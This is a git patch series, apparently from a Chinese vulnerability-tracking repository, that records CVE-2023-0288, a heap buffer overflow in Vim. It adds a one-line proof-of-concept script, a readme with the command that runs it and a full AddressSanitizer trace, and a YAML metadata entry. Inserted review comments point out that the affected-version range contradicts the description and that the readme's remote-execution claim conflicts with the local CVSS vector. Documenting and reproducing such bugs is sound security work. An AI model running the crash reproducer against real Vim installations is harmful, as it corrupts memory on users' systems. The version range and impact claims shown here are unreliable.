From 845c38add6a4c9f8d553ef785c6073c732f83513 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Wed, 22 Mar 2023 13:14:15 +0000 Subject: [PATCH 1/6] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2023-0288?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/vim/2023/CVE-2023-0288/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/vim/2023/CVE-2023-0288/.keep diff --git a/cve/vim/2023/CVE-2023-0288/.keep b/cve/vim/2023/CVE-2023-0288/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 9a327a8bafba39f18f0d61f64760d5fa22d913a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Wed, 22 Mar 2023 13:14:53 +0000 Subject: [PATCH 2/6] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE=5F2023=5F0288?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E4=BF=A1=E6=81=AF?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王郁含 --- cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat | 1 + cve/vim/2023/CVE-2023-0288/readme.md | 101 +++++++++++++++++++++ 2 files changed, 102 insertions(+) create mode 100644 cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat create mode 100644 cve/vim/2023/CVE-2023-0288/readme.md diff --git a/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat b/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat new file mode 100644 index 00000000..78779922 --- /dev/null +++ b/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat @@ -0,0 +1 @@ +sil0norm8R V{zf8=Lu \ No newline at end of file diff --git a/cve/vim/2023/CVE-2023-0288/readme.md b/cve/vim/2023/CVE-2023-0288/readme.md new file mode 100644 index 00000000..5ad3db9d --- /dev/null +++ b/cve/vim/2023/CVE-2023-0288/readme.md 
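Review bot: The PoC as printed in this hunk, `sil0norm8R V{zf8=Lu`, contains no visible <Esc> between the `R` (Replace mode) and the trailing `u`, yet the readme's ASan trace reaches nv_undo through ex_normal, so the real file presumably carries non-printable bytes that text views and copy-paste silently drop. Add the exact bytes to the readme as an `xxd` dump next to the `-S ./poc_hbo02_s.dat` command so readers can verify they have an unmodified reproducer, and mark the file binary in `.gitattributes` (`cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat binary`) so line-ending or whitespace normalization cannot alter it. The file is also committed without a trailing newline; stating whether that is intentional would help anyone regenerating it.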
@@ -0,0 +1,101 @@ +#### 描述 + +memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出 + +#### 影响版本 + +``` +git log +commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD) +``` + +#### Proof of Concept + +``` +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa! +================================================================= +==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8 +READ of size 2147479553 at 0x621000009d00 thread T0 + #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e) + #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6 + #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9 + #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2 + #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12 + #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7 + #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6 + #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5 + #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2 + #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2 + #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5 + #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6 + #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5 + #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6 + #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 + #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17 + #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5 + #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12 + #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14 + #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2 + #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 + #21 0x7f2ae5 in do_cmdline 
/home/fuzz/vim/src/ex_docmd.c:993:17 + #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12 + #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2 + #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2 + #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 + #26 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 + #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad) + +0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00) +allocated by thread T0 here: + #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d) + #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11 + #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12 + #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21 + #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26 + #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15 + #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15 + #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9 + #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9 + #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5 + #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 + #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 + +SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove +Shadow bytes around the buggy address: + 0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93c0: fa fa fa fa 
fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb + Shadow gap: cc +==11458==ABORTING +``` + +#### 影响 + +这个漏洞能够使软件崩溃,修改内存,并可能造成远程执行。 \ No newline at end of file -- Gitee From 3704e82c1e3930494e86ca7e8d292ea3c5c14655 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Wed, 22 Mar 2023 13:21:53 +0000 Subject: [PATCH 3/6] add cve/vim/2023/yaml/CVE-2023-0288. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王郁含 --- cve/vim/2023/yaml/CVE-2023-0288 | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/vim/2023/yaml/CVE-2023-0288 diff --git a/cve/vim/2023/yaml/CVE-2023-0288 b/cve/vim/2023/yaml/CVE-2023-0288 new file mode 100644 index 00000000..08329eac --- /dev/null +++ b/cve/vim/2023/yaml/CVE-2023-0288 
@@ -0,0 +1,19 @@ +id: CVE-2023-0288 +source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。 + scope-of-influence: + vim < 9.0.1182 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0288 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-0288 + cwe-id: CWE-122 + cnvd-id: None + kve-id: None + tags: cve2023, 堆buffer溢出漏洞 \ No newline at end of file -- Gitee From e99846f21ee92c69366e8947f0c0c75f08b3b6f7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Wed, 22 Mar 2023 13:23:33 +0000 Subject: [PATCH 4/6] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王郁含 --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index e5495c40..53dee267 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -107,6 +107,7 @@ cve: - CVE-2023-0049 - CVE-2023-0051 - CVE-2023-0054 + - CVE-2023-0288 - CVE-2023-0512 - CVE-2023-1127 openssl: -- Gitee From c1bc124c70701c0f9def5f1c2b13167b8969f068 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Fri, 24 Mar 2023 02:53:50 +0000 Subject: [PATCH 5/6] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?vim/2023/CVE-2023-0288/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/vim/2023/CVE-2023-0288/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/vim/2023/CVE-2023-0288/.keep diff --git a/cve/vim/2023/CVE-2023-0288/.keep b/cve/vim/2023/CVE-2023-0288/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 76b9e476ceacd1ca52feba9efa013b641a478074 Mon Sep 17 00:00:00 2001 
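Review bot: `scope-of-influence: vim < 9.0.1182` contradicts the `description` in the same file ("在9.0.1182版本存在") and the readme in patch 2, which reproduces the crash on tag v9.0.1182 (commit 043d7b2c); as written, the affected range excludes the very version the PoC was confirmed on. The upstream bound should be the patch level that closed the huntr report (NVD's entry gives "prior to 9.0.1189", but confirm against the vim fix commit before changing it), e.g. `scope-of-influence: vim < 9.0.1189`, and the fix commit is worth adding under `reference`. The CVSS vector here is AV:L, while the readme's 影响 section claims possible remote execution; keep the two consistent by describing the impact as local crash/memory corruption unless a remote vector is demonstrated.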
From: =?UTF-8?q?=E7=8E=8B=E9=83=81=E5=90=AB?= Date: Fri, 24 Mar 2023 02:54:07 +0000 Subject: [PATCH 6/6] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/vim/2023/?= =?UTF-8?q?yaml/CVE-2023-0288=20=E4=B8=BA=20cve/vim/2023/yaml/CVE-2023-028?= =?UTF-8?q?8.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/vim/2023/yaml/{CVE-2023-0288 => CVE-2023-0288.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/vim/2023/yaml/{CVE-2023-0288 => CVE-2023-0288.yaml} (100%) diff --git a/cve/vim/2023/yaml/CVE-2023-0288 b/cve/vim/2023/yaml/CVE-2023-0288.yaml similarity index 100% rename from cve/vim/2023/yaml/CVE-2023-0288 rename to cve/vim/2023/yaml/CVE-2023-0288.yaml -- Gitee